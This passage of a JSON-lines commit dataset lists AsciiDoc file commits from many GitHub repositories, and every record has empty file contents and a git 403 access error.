2015-06-08-A-remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer.adoc","new_file":"_posts\/2015-06-08-A-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3509aeca7d23346fe11b54a2bd10519635db095a","subject":"Update 2017-02-21-A-Hard-Poem.adoc","message":"Update 2017-02-21-A-Hard-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-21-A-Hard-Poem.adoc","new_file":"_posts\/2017-02-21-A-Hard-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3a82763b491e5e4de7c4cab1da932cbe4a188f0","subject":"Add deprecation note for redis_cache module name on the documentation.","message":"Add deprecation note for redis_cache module name on the documentation.\n","repos":"smahs\/django-redis,yanheng\/django-redis,GetAmbassador\/django-redis,lucius-feng\/django-redis,zl352773277\/django-redis","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yanheng\/django-redis.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a3027b9cafc3e761043efa6f9e99b4c9d46cec5c","subject":"updated docs with more info about schema mode","message":"updated docs with more info about schema mode\n","repos":"pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"263262b3470e94fa6a8204641a6bdd4c977c867c","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ed77cac0788d4bf65622e67e54a2a2419366786","subject":"UI-dev doc fixes","message":"UI-dev doc 
fixes\n","repos":"lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/ui-dev.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/ui-dev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab3812c3d16070d0a9c454e63801b7b1aa1721f6","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a54d35e428b0d43a7a6b611a3b96f0d5abb872b","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c58d8489426d733d1f26f504e9c920decf5c02","subject":"2021, not 2020","message":"2021, not 2020\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"381e244469eebe9f620fd45a169bcfde20f48901","subject":"Add readme.","message":"Add readme.\n","repos":"byllyfish\/pylibofp,byllyfish\/pylibofp","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/byllyfish\/pylibofp.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bf2efe1be6b1321ebce5a88bf4aa0c400cfdb2d","subject":"docs: readme: add link to journal format","message":"docs: readme: add link to journal format\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b820ea743686f4c43b18ea05dd567e04b22376b5","subject":"Add readme","message":"Add readme","repos":"ge0ffrey\/maven-dependency-puzzlers,ge0ffrey\/maven-dependency-puzzlers","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ge0ffrey\/maven-dependency-puzzlers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9c4fb4f8f4a507eb4985cf96523e1b5b64c526d","subject":"Create README.adoc","message":"Create README.adoc","repos":"adoc-editor\/editor-web,adoc-editor\/editor-web","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-web.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dca619fcaa82b791c79c69fb1acab5084e3f7ac","subject":"symlinked README","message":"symlinked README\n","repos":"Yubico\/yubico-j,Yubico\/yubico-j,Yubico\/yubico-j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-j.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"172db8956cbe93e06a0d32cb6ceaf9255d2bfb3a","subject":"repo: Add a readme file","message":"repo: Add a readme file\n\nThe readme will contain information about this repository. The\ninformation will probably range from trivia (e.g. 'What are dotfiles?')\nto installation instructions.\n\nIt will be written in the asciidoc[1] markup language, which most of the\nmajor git hosting providers are capable of rendering.\n\nI will try to write text files in 'ventilated prose'[2], i.e. one\nsentence per line. 
This should make it easier to read the plain text\nfile and easier to spot changes in git diffs.\n\n[1]: www.asciidoctor.org\n[2]: https:\/\/vanemden.wordpress.com\/2009\/01\/01\/ventilated-prose\/\n","repos":"PigeonF\/.dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed33513c3f71cd03c037a52cb08d26284d4a974c","subject":"y2b create post New Google Chromecast (2015) - Awesome Stuff Week","message":"y2b create post New Google Chromecast (2015) - Awesome Stuff Week","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-26-New-Google-Chromecast-2015--Awesome-Stuff-Week.adoc","new_file":"_posts\/2015-10-26-New-Google-Chromecast-2015--Awesome-Stuff-Week.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e48fc73b247263992ff7cf3f72dd31f5b9e8b547","subject":"PCL ROS EIGEN C++","message":"PCL ROS EIGEN C++\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Modern C++\/README.adoc","new_file":"Modern C++\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dee5ab815388ae6d15eba0e3b72e9431a016938e","subject":"Add Omni Core \u2018contributing\u2019 page for some tests.","message":"Add Omni Core \u2018contributing\u2019 page for some tests.","repos":"OmniLayer\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ","old_file":"adoc\/contributing.adoc","new_file":"adoc\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fee47afce29cae0c43b77ac4e734ed38ba5e7c8","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8efca6cbce87a8000b91350841110d2658d76d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"551c8afd3cb9d2171aa566e9d27ea3befc97747f","subject":"v2.04","message":"v2.04\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"923337501f10ec09df703b87ab2402ed6972e722","subject":"v2.07","message":"v2.07\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7f4182a7fcf6be1066bb84321792d54d7603091","subject":"adding a readme","message":"adding a readme\n","repos":"arun-gupta\/couchbase-xdcr-docker","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arun-gupta\/couchbase-xdcr-docker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7a1d9815366702e4b4c2e6f3f60ed160bbfdbae","subject":"Add readme.adoc","message":"Add readme.adoc\n\n","repos":"JmyL\/bible-clipper,nofearbutlove\/bible-clipper","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JmyL\/bible-clipper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a60d88f3178625ace318c55c250c39edebdcd9","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57a0f60f026254dab4ce3986a8bb91c814a9ff7d","subject":"KUDU-1275 Clarify that you must partition tables during creation, add partitioning rules of thumb.","message":"KUDU-1275 Clarify that you must partition tables during creation, add partitioning rules of thumb.\n\nAlso fix some formatting errors where the section on insertionsgot scrambled amongst the section about partitioning.\n\nChange-Id: Ic366ec19c2ca4edfa5e296c359d641dcf48c1f02\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1546\nReviewed-by: Martin Grund <2546548d516fa64c411fde8242af35f3f80ad31f@cloudera.com>\nTested-by: Misty Stanley-Jones 
<b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"139cff7ea7783bb7d3f1cb5784b6ac448fa7a6a6","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc273005d34c31300f5992598b58fd776ac3d649","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"defe1b0b96dbbfe4221449ec37843574eafe80af","subject":"Update 2015-12-08-Release-asciidoctor-ant-152.adoc","message":"Update 2015-12-08-Release-asciidoctor-ant-152.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-12-08-Release-asciidoctor-ant-152.adoc","new_file":"_posts\/2015-12-08-Release-asciidoctor-ant-152.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0409b826ac9d90b5935e2d65cbb23970db666522","subject":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","message":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e824d48fc18b3caac272ba9d6b88d2a85dc66c89","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99521f8451b34fef662f48310ede70b2a72a683f","subject":"Update 2020-04-25-This-week-i-joined-Makerlog.adoc","message":"Update 2020-04-25-This-week-i-joined-Makerlog.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc","new_file":"_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbca7545e13fd373a93294837f497a90643dd795","subject":"Create README-ko.adoc file","message":"Create README-ko.adoc file\n\nREADME korean translation\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/README-ko.adoc","new_file":"docs\/README-ko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4062809ea553f2fd028e877858602b925087347","subject":"y2b create post 5 Cool Gadgets Under $10","message":"y2b create post 5 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-21-5%20Cool%20Gadgets%20Under%20%2410.adoc","new_file":"_posts\/2018-01-21-5%20Cool%20Gadgets%20Under%20%2410.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbf8cc1a005f4e1ee87e6af10d11a676a7939b55","subject":"Initial Developer Documentation","message":"Initial Developer 
Documentation\n","repos":"Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/alerts.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/alerts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cb887edaf074fdc0bdd5dcccc39da45bd015afa","subject":"Added Camel 2.20.1 release notes to docs","message":"Added Camel 2.20.1 release notes to 
docs\n","repos":"sverkera\/camel,zregvart\/camel,gnodet\/camel,DariusX\/camel,nicolaferraro\/camel,anoordover\/camel,jamesnetherton\/camel,kevinearls\/camel,pax95\/camel,mcollovati\/camel,davidkarlsen\/camel,gnodet\/camel,mcollovati\/camel,nikhilvibhav\/camel,sverkera\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,christophd\/camel,pax95\/camel,apache\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,Fabryprog\/camel,mcollovati\/camel,alvinkwekel\/camel,tadayosi\/camel,DariusX\/camel,pmoerenhout\/camel,apache\/camel,jamesnetherton\/camel,DariusX\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,ullgren\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,CodeSmell\/camel,pax95\/camel,CodeSmell\/camel,anoordover\/camel,punkhorn\/camel-upstream,gnodet\/camel,onders86\/camel,Fabryprog\/camel,christophd\/camel,onders86\/camel,ullgren\/camel,tadayosi\/camel,onders86\/camel,tadayosi\/camel,punkhorn\/camel-upstream,sverkera\/camel,tdiesler\/camel,anoordover\/camel,tadayosi\/camel,tdiesler\/camel,alvinkwekel\/camel,tdiesler\/camel,tdiesler\/camel,zregvart\/camel,adessaigne\/camel,gnodet\/camel,pax95\/camel,Fabryprog\/camel,ullgren\/camel,alvinkwekel\/camel,christophd\/camel,sverkera\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,CodeSmell\/camel,anoordover\/camel,zregvart\/camel,davidkarlsen\/camel,onders86\/camel,sverkera\/camel,mcollovati\/camel,jamesnetherton\/camel,alvinkwekel\/camel,nicolaferraro\/camel,apache\/camel,apache\/camel,kevinearls\/camel,CodeSmell\/camel,objectiser\/camel,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,tdiesler\/camel,sverkera\/camel,DariusX\/camel,ullgren\/camel,kevinearls\/camel,davidkarlsen\/camel,anoordover\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,punkhorn\/camel-upstream,apache\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,adessaigne\/camel,jamesnetherton\/camel,pmoerenhout\/camel,pmoerenhout\/camel,kevinearls\/camel,davidkarlsen\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,zregvart\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2201-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2201-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"850e40b0ee154847cb95e318efde5d022af05417","subject":"y2b create post Nintendo NES Deluxe Set Unboxing (1985)","message":"y2b create post Nintendo NES Deluxe Set Unboxing (1985)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-07-Nintendo-NES-Deluxe-Set-Unboxing-1985.adoc","new_file":"_posts\/2012-02-07-Nintendo-NES-Deluxe-Set-Unboxing-1985.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb27469c4a7ee59b4990d7d90ee5d092bd1dd93","subject":"Add contributing docs","message":"Add contributing 
docs\n","repos":"linlynn\/spring-cloud-build,spring-cloud\/spring-cloud-build,linlynn\/spring-cloud-build,royclarkson\/spring-cloud-build,spring-cloud\/spring-cloud-build,royclarkson\/spring-cloud-build","old_file":"src\/main\/asciidoc\/contributing.adoc","new_file":"src\/main\/asciidoc\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/linlynn\/spring-cloud-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e7430b0fc714d182f2915f3c7162fa2ee78a4fa","subject":"Create faq.asciidoc","message":"Create faq.asciidoc","repos":"addonis1990\/docs,luiz158\/docs,forge\/docs,forge\/docs,agoncal\/docs,addonis1990\/docs,agoncal\/docs,luiz158\/docs","old_file":"get_started\/faq.asciidoc","new_file":"get_started\/faq.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 